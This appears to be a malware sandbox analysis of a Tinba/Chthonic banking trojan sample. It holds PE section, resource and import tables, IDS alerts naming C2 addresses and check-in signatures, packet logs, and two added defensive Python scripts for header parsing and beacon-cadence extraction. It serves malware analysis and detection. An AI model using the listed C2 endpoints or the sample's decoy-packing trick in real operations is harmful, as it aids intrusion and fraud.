Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
UPX0      0x1000           0x10000       0xf600    False     0.4557768038617886  DOS executable (COM)  4.895667733918766   IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1      0x11000          0xb000        0xaa00    False     0.3551470588235294  data                  5.65815268907495    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x1c000          0x1000        0x800     False     0.41162109375       data                  3.379567063767855   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.imports  0x1d000          0x1000        0xc00     False     0.421875            data                  4.436376811230836   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
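The section table is where the "UPX compressed" wording of the file-type and TrID lines stops holding up: the entry point 0x405a80 sits in UPX0, UPX0 occupies 0xf600 bytes on disk, and UPX1 has an entropy of 5.66 bits per byte, whereas a file genuinely packed with UPX has an empty UPX0 (raw size 0, reserved for the unpacked image), its entry point in the UPX1 stub, and near-8-bit entropy in UPX1. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses a PE32 header with the Python standard library only and re-derives the fields listed above: the timestamp, the characteristic flags, the section each data directory falls in (the "Is in Section" column), the entry-point section, and then the UPX consistency check. Because the sample itself is not reproduced here, the header bytes are constructed inline from the values in this report; the fields the report does not list (linker version, file alignment, raw-data offsets, stack and heap sizes) are assumptions, marked as such in the code.

```python
"""Re-derive the static PE fields listed above from raw headers.

Added example, not part of the Joe Sandbox report or of Joe Sandbox itself.
build_sample_header() constructs a PE32 header inline from the values the
report gives for java.exe (timestamp, entry point, image base, the two
populated data directories and the four sections); fields the report does
not list are assumed, and section contents are not reproduced."""
import struct
from datetime import datetime, timezone

COFF_FMT = "<IHHIIIHH"        # Signature, Machine, NumberOfSections, TimeDateStamp, ..., Characteristics
OPT_FMT = "<HBB9I6H4I2H6I"    # PE32 optional header up to NumberOfRvaAndSizes (96 bytes)
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER (40 bytes)
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
                   "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
FILE_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
              0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED", 0x2000: "DLL"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x8000: "TERMINAL_SERVER_AWARE"}


def build_sample_header():
    """Constructed header mirroring the report's section table; not the real file."""
    sections = [  # name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics
        (b"UPX0", 0x1000, 0x10000, 0xf600, 0xE0000080),
        (b"UPX1", 0x11000, 0xb000, 0xaa00, 0xE0000040),
        (b".rsrc", 0x1c000, 0x1000, 0x800, 0xC0000040),
        (b".imports", 0x1d000, 0x1000, 0xc00, 0xC0000040)]
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2] = (0x1d000, 0x8c), (0x1c000, 0x638)  # IMPORT, RESOURCE as reported
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3c, 0x80)               # e_lfanew
    coff = struct.pack(COFF_FMT, 0x4550, 0x14c, len(sections), 0x5454392C, 0, 0,
                       struct.calcsize(OPT_FMT) + 128, 0x0303)
    opt = struct.pack(OPT_FMT, 0x10b, 8, 0,               # PE32 magic; linker version assumed
                      0xf600, 0xb600, 0, 0x5a80, 0x1000, 0x11000,  # sizes assumed; entry RVA = 0x405a80 - 0x400000
                      0x400000, 0x1000, 0x200,            # ImageBase, SectionAlignment, FileAlignment (assumed)
                      4, 0, 4, 0, 4, 0,                   # OS, image and subsystem versions
                      0, 0x1e000, 0x400, 0,               # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                      3, 0x8100,                          # windows cui; NX_COMPAT | TERMINAL_SERVER_AWARE
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)  # stack/heap assumed; 16 directories
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    raw_ptr, shdrs = 0x400, b""                           # raw-data offsets assumed
    for name, va, vsize, raw, flags in sections:
        shdrs += struct.pack(SECTION_FMT, name, vsize, va, raw, raw_ptr, 0, 0, 0, 0, flags)
        raw_ptr += raw
    return bytes(dos) + coff + opt + shdrs


def decode_flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def section_for_rva(sections, rva):
    """Section whose virtual range holds rva, or None (the report's 'Is in Section')."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"]):
            return s["name"]
    return None


def parse_pe(data):
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
    sig, _machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, e_lfanew)
    if sig != 0x4550:
        raise ValueError("missing PE signature")
    opt_off = e_lfanew + struct.calcsize(COFF_FMT)
    opt = struct.unpack_from(OPT_FMT, data, opt_off)
    if opt[0] != 0x10b:
        raise ValueError("only PE32 is handled here")
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, *_, sflags = struct.unpack_from(SECTION_FMT, data, opt_off + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "raw": raw, "flags": sflags})
    dirs = {}
    for i in range(min(opt[29], 16)):
        va, size = struct.unpack_from("<II", data, opt_off + struct.calcsize(OPT_FMT) + 8 * i)
        dirs[DIRECTORY_NAMES[i]] = (va, size, section_for_rva(sections, va) if size else None)
    return {"timestamp_utc": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
            "characteristics": decode_flags(chars, FILE_FLAGS),
            "dll_characteristics": decode_flags(opt[23], DLL_FLAGS),
            "subsystem": opt[22], "entry_rva": opt[6], "entry_va": opt[9] + opt[6],
            "sections": sections, "directories": dirs}


def upx_consistency(pe):
    """Genuine UPX output keeps UPX0 empty on disk (raw size 0) and starts in UPX1,
    the packed stub; a file that only borrows the section names fails both checks."""
    findings, by_name = [], {s["name"]: s for s in pe["sections"]}
    if "UPX0" in by_name and by_name["UPX0"]["raw"]:
        findings.append("UPX0 has raw size %#x; real UPX leaves it at 0" % by_name["UPX0"]["raw"])
    ep_section = section_for_rva(pe["sections"], pe["entry_rva"])
    if "UPX1" in by_name and ep_section != "UPX1":
        findings.append("entry point %#x lies in %s, not UPX1" % (pe["entry_va"], ep_section))
    return findings


if __name__ == "__main__":
    pe = parse_pe(build_sample_header())
    print(pe["timestamp_utc"], pe["characteristics"], hex(pe["entry_va"]))
    print({d: v for d, v in pe["directories"].items() if v[1]})
    print("\n".join(upx_consistency(pe)))
```

To run it against the real file, replace build_sample_header() with open(path, "rb").read(); the parser touches headers only, so the same call works on the dropped copy written by winver.exe, whose size and file type match the sample. The two UPX findings are heuristics, not a detection: they tell the analyst that the "UPX compressed" label should not be trusted and that the sample should be treated as unpacked code with decoy section names until a proper unpacking attempt says otherwise.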
Name           RVA      Size    Type                                                            Language  Country  ZLIB Complexity
RT_ICON        0x11228  0x668   Device independent bitmap graphic, 48 x 96 x 4, image size 0                      0.21890243902439024
RT_ICON        0x118a0  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 0                      0.3400537634408602
RT_ICON        0x11b98  0x1e8   Device independent bitmap graphic, 24 x 48 x 4, image size 0                      0.35450819672131145
RT_ICON        0x11d90  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 0                      0.46283783783783783
RT_ICON        0x11ec8  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0                      0.5026652452025586
RT_ICON        0x12d80  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0                      0.5798736462093863
RT_ICON        0x13638  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0                      0.40264976958525345
RT_ICON        0x13d10  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0                      0.3273121387283237
RT_ICON        0x14288  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0                     0.27344398340248965
RT_ICON        0x16840  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0                     0.37875234521575984
RT_ICON        0x178f8  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0                     0.37868852459016394
RT_ICON        0x18290  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0                     0.4796099290780142
RT_GROUP_ICON  0x18708  0xae    data                                                                              0.5977011494252874
RT_VERSION     0x1c2fc  0x33c   data                                                                              0.47342995169082125
DLL | Import
GDI32.dll | GetDeviceCaps
KERNEL32.DLL | AddAtomW, FreeConsole, GetCurrencyFormatW, IsProcessorFeaturePresent, CreateEventA, OpenFileMappingW, LocalHandle, HeapSize, MulDiv, WriteFile, GetTempFileNameW, SetLocaleInfoW, DosDateTimeToFileTime, EnumLanguageGroupLocalesW, CreatePipe, GetPrivateProfileSectionNamesA, SetConsoleTitleA, CancelDeviceWakeupRequest, GetVolumePathNameA, GetProfileIntA, GetDateFormatA, DebugBreak, SuspendThread, SetCommMask, EnumUILanguagesW, MoveFileWithProgressA, BackupRead, GetNumberOfConsoleInputEvents, GetLongPathNameA, FreeLibrary, GetFileAttributesW, EnumDateFormatsA, QueryDosDeviceA, UpdateResourceW, WritePrivateProfileStructA, lstrcpynA, GetExitCodeProcess, GlobalAddAtomW, GetShortPathNameW, UnlockFileEx, SetComputerNameExA, GetExitCodeProcess
WINMM.dll | timeSetEvent, waveOutOpen, midiConnect, midiOutSetVolume, mmioOpenA, mmioWrite, DrvGetModuleHandle, mciGetDeviceIDFromElementIDW, waveOutGetErrorTextW, joyGetPosEx, mixerSetControlDetails, joySetThreshold, mmioRead, waveOutGetDevCapsA, DefDriverProc, mmioDescend, mixerGetLineInfoA, mciSendStringA, midiOutClose, midiInGetDevCapsW, midiStreamOut, mmioSetBuffer, midiInClose, waveOutReset, midiOutPrepareHeader, waveInGetPosition, GetDriverModuleHandle, mmioGetInfo, midiInMessage, mciGetCreatorTask, auxGetVolume, joyGetDevCapsW, waveInGetErrorTextA, mixerGetLineControlsW
mscms.dll | GetColorProfileElement, UninstallColorProfileA, AssociateColorProfileWithDeviceA, EnumColorProfilesW, GetStandardColorSpaceProfileW, DisassociateColorProfileFromDeviceW, GetStandardColorSpaceProfileA, SetStandardColorSpaceProfileW, DeleteColorTransform, GetPS2ColorRenderingIntent, SetColorProfileHeader, TranslateBitmapBits, CreateColorTransformA, ConvertIndexToColorName, CreateProfileFromLogColorSpaceW, RegisterCMMW, GetColorProfileElementTag, GetColorProfileFromHandle, UninstallColorProfileW, CreateMultiProfileTransform, GetCountColorProfileElements, InstallColorProfileA, CreateColorTransformW, CheckColors, SetColorProfileElementReference
msvcrt.dll | iswprint, _wgetenv, srand, strtok, iswupper, tolower, fputs, _swab, wcsncpy, _fputchar, iswctype, _strupr, bsearch, _strnicmp, memcmp, _wspawnl, _abnormal_termination, _rotl, _flsbuf, isdigit, memmove, _isctype, isalpha, isgraph, _wspawnvpe, _wexecve, _wcslwr, _wcsrev, fputwc, _fcvt, _ultoa, tmpnam, _wcreat
ole32.dll | OleCreateFromData, HWND_UserMarshal, CreateAntiMoniker, CoInitialize, CoSetProxyBlanket, CoDisconnectObject, ReleaseStgMedium, HGLOBAL_UserSize, PropStgNameToFmtId
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/20/24-20:41:48.295231 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49742 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:48.295231 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49742 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:42.359145 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49738 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:42.359145 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49738 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:49.827227 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49743 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:42.359145 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49738 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:43.842659 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49739 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:43.842659 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49739 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:46.905610 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49741 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:33.804089 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49735 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:45.528112 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49740 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:33.804089 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49735 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:39.347423 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49736 | 80 | 192.168.2.4 | 178.62.201.34
01/20/24-20:41:40.938841 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49737 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:45.528112 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49740 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:49.827227 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49743 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:46.905610 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49741 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:49.827227 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49743 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:48.295231 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49742 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:43.842659 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49739 | 80 | 192.168.2.4 | 216.218.185.162
01/20/24-20:41:39.347423 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49736 | 80 | 192.168.2.4 | 178.62.201.34
01/20/24-20:41:40.938841 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49737 | 80 | 192.168.2.4 | 216.218.185.162
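The alert rows above carry everything an analyst needs to turn the report into indicators and a check-in cadence: the C2 endpoints, the rule SIDs that fired on each, and one timestamp per connection. The Python below is an added example, not part of the Joe Sandbox report or of the Tinba sample; the ALERT_LINES text is constructed from the rows of the alert table (one alert per line, columns in the order of the table), and the line layout, the function names (parse_alerts, c2_indicators, checkin_times, beacon_intervals, median_interval) and the use of the median gap as the cadence estimate are this example's own assumptions. Several rules fire on the same TCP connection, so check-ins are deduplicated on the client's ephemeral source port before the gaps are computed.

```python
"""Extract C2 indicators and check-in cadence from sandbox IDS alert rows.
Added example; ALERT_LINES is constructed from this report's alert table."""
from __future__ import annotations

import re
import statistics
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: timestamp, protocol, SID, "message", sport, dport, src, dst.
ALERT_LINES = """\
01/20/24-20:41:48.295231 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49742 80 192.168.2.4 216.218.185.162
01/20/24-20:41:48.295231 TCP 2830613 "ETPRO TROJAN W32/Chthonic CnC Activity" 49742 80 192.168.2.4 216.218.185.162
01/20/24-20:41:42.359145 TCP 2830613 "ETPRO TROJAN W32/Chthonic CnC Activity" 49738 80 192.168.2.4 216.218.185.162
01/20/24-20:41:42.359145 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49738 80 192.168.2.4 216.218.185.162
01/20/24-20:41:49.827227 TCP 2830613 "ETPRO TROJAN W32/Chthonic CnC Activity" 49743 80 192.168.2.4 216.218.185.162
01/20/24-20:41:42.359145 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49738 80 192.168.2.4 216.218.185.162
01/20/24-20:41:43.842659 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49739 80 192.168.2.4 216.218.185.162
01/20/24-20:41:43.842659 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49739 80 192.168.2.4 216.218.185.162
01/20/24-20:41:46.905610 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49741 80 192.168.2.4 216.218.185.162
01/20/24-20:41:33.804089 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49735 80 192.168.2.4 216.218.185.162
01/20/24-20:41:45.528112 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49740 80 192.168.2.4 216.218.185.162
01/20/24-20:41:33.804089 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49735 80 192.168.2.4 216.218.185.162
01/20/24-20:41:39.347423 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49736 80 192.168.2.4 178.62.201.34
01/20/24-20:41:40.938841 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49737 80 192.168.2.4 216.218.185.162
01/20/24-20:41:45.528112 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49740 80 192.168.2.4 216.218.185.162
01/20/24-20:41:49.827227 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49743 80 192.168.2.4 216.218.185.162
01/20/24-20:41:46.905610 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49741 80 192.168.2.4 216.218.185.162
01/20/24-20:41:49.827227 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49743 80 192.168.2.4 216.218.185.162
01/20/24-20:41:48.295231 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49742 80 192.168.2.4 216.218.185.162
01/20/24-20:41:43.842659 TCP 2830613 "ETPRO TROJAN W32/Chthonic CnC Activity" 49739 80 192.168.2.4 216.218.185.162
01/20/24-20:41:39.347423 TCP 2020418 "ET TROJAN Tinba Checkin 2" 49736 80 192.168.2.4 178.62.201.34
01/20/24-20:41:40.938841 TCP 2024659 "ET TROJAN [PTsecurity] Tinba Checkin 4" 49737 80 192.168.2.4 216.218.185.162
"""

ROW_RE = re.compile(
    r'^(?P<ts>\S+) (?P<proto>\S+) (?P<sid>\d+) "(?P<msg>[^"]*)" '
    r'(?P<sport>\d+) (?P<dport>\d+) (?P<src>\S+) (?P<dst>\S+)$'
)


@dataclass(frozen=True)
class Alert:
    ts: datetime
    proto: str
    sid: int
    msg: str
    sport: int
    dport: int
    src: str
    dst: str


def parse_alerts(text: str) -> list[Alert]:
    """Parse one alert per line; a malformed line raises instead of being silently dropped."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError(f"unparseable alert row: {line!r}")
        alerts.append(Alert(
            ts=datetime.strptime(m["ts"], "%m/%d/%y-%H:%M:%S.%f"),
            proto=m["proto"], sid=int(m["sid"]), msg=m["msg"],
            sport=int(m["sport"]), dport=int(m["dport"]),
            src=m["src"], dst=m["dst"]))
    return alerts


def c2_indicators(alerts: list[Alert]) -> dict[tuple[str, int], set[int]]:
    """Map each (dest IP, dest port) that raised an alert to the SIDs that fired on it."""
    out: dict[tuple[str, int], set[int]] = defaultdict(set)
    for a in alerts:
        out[(a.dst, a.dport)].add(a.sid)
    return dict(out)


def checkin_times(alerts: list[Alert], dst: str) -> list[datetime]:
    """One timestamp per TCP connection to dst: several rules fire on the same
    connection, so collapse them on the client's ephemeral source port."""
    first_seen: dict[int, datetime] = {}
    for a in alerts:
        if a.dst == dst and a.proto == "TCP":
            first_seen[a.sport] = min(a.ts, first_seen.get(a.sport, a.ts))
    return sorted(first_seen.values())


def beacon_intervals(alerts: list[Alert], dst: str) -> list[float]:
    """Seconds between consecutive check-ins to dst."""
    times = checkin_times(alerts, dst)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def median_interval(alerts: list[Alert], dst: str) -> float | None:
    """Median check-in gap, or None with fewer than two connections. The median
    is used so one long gap (e.g. a detour to a second C2) does not skew it."""
    gaps = beacon_intervals(alerts, dst)
    return statistics.median(gaps) if gaps else None


if __name__ == "__main__":
    alerts = parse_alerts(ALERT_LINES)
    for (ip, port), sids in sorted(c2_indicators(alerts).items()):
        med = median_interval(alerts, ip)
        print(f"{ip}:{port} sids={sorted(sids)} connections={len(checkin_times(alerts, ip))} "
              f"median gap={'n/a' if med is None else f'{med:.2f}s'}")
```

Run on the rows of this report the script yields two endpoints: 216.218.185.162:80 with eight connections about 1.5 s apart and all three SIDs, and 178.62.201.34:80 with a single connection. The one gap of roughly 7 s in the 216.218.185.162 series is where the 49736 connection to 178.62.201.34 sits, which is why the median rather than the mean is reported as the cadence.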
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2024 20:40:49.999314070 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:40:59.608702898 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:12.790848017 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:12.792475939 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:12.792515039 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:12.792593002 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:12.793143988 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:12.793160915 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:13.093056917 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:13.124512911 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:13.124597073 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:13.702439070 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:14.905580044 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:14.931662083 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:14.931703091 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:14.932826042 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:14.932955027 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:14.939837933 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:14.940105915 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:14.960537910 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:14.960589886 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:15.289644003 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:15.289729118 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:15.289983988 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:15.290144920 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:15.290208101 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:15.293447018 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:15.293472052 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Jan 20, 2024 20:41:15.293487072 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:15.294157028 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:17.311801910 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:22.124315023 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:31.733712912 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Jan 20, 2024 20:41:33.405186892 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:33.559664011 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:33.559739113 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:33.804089069 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:33.958657980 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:33.960119963 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:34.114711046 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:34.114938974 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:34.114959955 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:34.115211010 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:34.197063923 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:34.351465940 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:39.142398119 CET | 49736 | 80 | 192.168.2.4 | 178.62.201.34
Jan 20, 2024 20:41:39.344611883 CET | 80 | 49736 | 178.62.201.34 | 192.168.2.4
Jan 20, 2024 20:41:39.344835043 CET | 49736 | 80 | 192.168.2.4 | 178.62.201.34
Jan 20, 2024 20:41:39.347423077 CET | 49736 | 80 | 192.168.2.4 | 178.62.201.34
Jan 20, 2024 20:41:39.548655987 CET | 80 | 49736 | 178.62.201.34 | 192.168.2.4
Jan 20, 2024 20:41:39.548875093 CET | 49736 | 80 | 192.168.2.4 | 178.62.201.34
Jan 20, 2024 20:41:39.750291109 CET | 80 | 49736 | 178.62.201.34 | 192.168.2.4
Jan 20, 2024 20:41:39.847723007 CET | 80 | 49736 | 178.62.201.34 | 192.168.2.4
Jan 20, 2024 20:41:39.848390102 CET | 49736 | 80 | 192.168.2.4 | 178.62.201.34
Jan 20, 2024 20:41:39.848390102 CET | 49736 | 80 | 192.168.2.4 | 178.62.201.34
Jan 20, 2024 20:41:40.049669027 CET | 80 | 49736 | 178.62.201.34 | 192.168.2.4
Jan 20, 2024 20:41:40.781498909 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:40.938597918 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:40.938769102 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:40.938841105 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:41.093322039 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:41.093404055 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:41.247828007 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:41.248694897 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:41.248708963 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:41.248930931 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:41.249335051 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:41.403767109 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:42.203521967 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:42.358956099 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:42.359042883 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:42.359144926 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:42.514241934 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:42.514324903 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:42.669533014 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:42.669940948 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:42.669955015 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:42.670139074 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
